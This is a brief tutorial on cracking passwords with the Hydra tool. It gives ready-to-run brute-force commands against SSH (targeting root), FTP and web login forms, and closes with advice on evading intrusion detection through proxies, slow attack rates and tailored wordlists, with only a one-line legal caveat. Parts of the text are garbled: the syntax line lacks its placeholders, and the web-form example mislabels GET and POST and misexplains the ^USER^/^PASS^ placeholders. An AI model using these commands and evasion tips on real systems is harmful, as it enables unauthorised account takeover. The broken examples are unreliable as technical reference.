TL;DR
This guide shows you how to use Hydra, a fast parallel brute-force attack tool, to crack passwords against various services. It covers installation, basic usage, and common service targets.
Installation
- Debian/Ubuntu: Open your terminal and run:
sudo apt update && sudo apt install hydra - Red Hat/CentOS: Use the EPEL repository first if you don’t have it. Then:
sudo yum install hydra - macOS: You can use Homebrew:
brew install hydra
Basic Usage
Hydra’s basic syntax is:
hydra -l -P - -l: Specifies the login username.
- -P: Points to a file containing a list of passwords to try.
: The IP address or hostname of the target server.: The service you’re trying to crack (e.g., ssh, ftp, http-get).
Example: SSH Brute Force
- Create a password list file (e.g.,
passwords.txt) with one password per line. - Run Hydra against the target:
hydra -l root -P passwords.txt 192.168.1.10 ssh - Hydra will attempt to log in as ‘root’ using each password from
passwords.txtagainst the SSH service on 192.168.1.10.
Example: FTP Brute Force
- Run Hydra:
hydra -l anonymous -P passwords.txt ftp://192.168.1.20 - This attempts to log in as ‘anonymous’ using the passwords from
passwords.txtagainst the FTP service at 192.168.1.20.
Example: HTTP GET Brute Force (Form-Based Login)
This is more complex and requires knowing the form parameters.
- Use a web browser’s developer tools to inspect the login form’s POST request. Identify the parameter names for username and password.
- Run Hydra:
hydra -l admin -P passwords.txt http://example.com/login "username=^USER^&password=^PASS^" - Replace
^USER^and^PASS^with the actual parameter names from the form.
Common Service Targets
- ssh: Secure Shell login.
- ftp: File Transfer Protocol login.
- http-get/http-post: Web server logins (often form-based).
- mysql: MySQL database login.
- postgres: PostgreSQL database login.
- smtp: Simple Mail Transfer Protocol login.
Important Options
- -t
: Number of threads to use (increase for faster attacks, but be careful not to overload the target). - -vV: Verbose mode – shows more detailed output. Use
-vvVfor even more detail. - -f: Exit after finding the first valid password.
- -o
: Save results to a file.
Legal Considerations
Using Hydra against systems you do not have permission to test is illegal and unethical. Only use this tool on networks and systems you own or have explicit written permission to assess.
cyber security Note
Brute-force attacks are often detected by intrusion detection systems (IDS) and firewalls. Consider using techniques like proxy servers, slow attack rates, and password lists tailored to the target to avoid detection. However, even with these measures, successful brute-forcing is not guaranteed.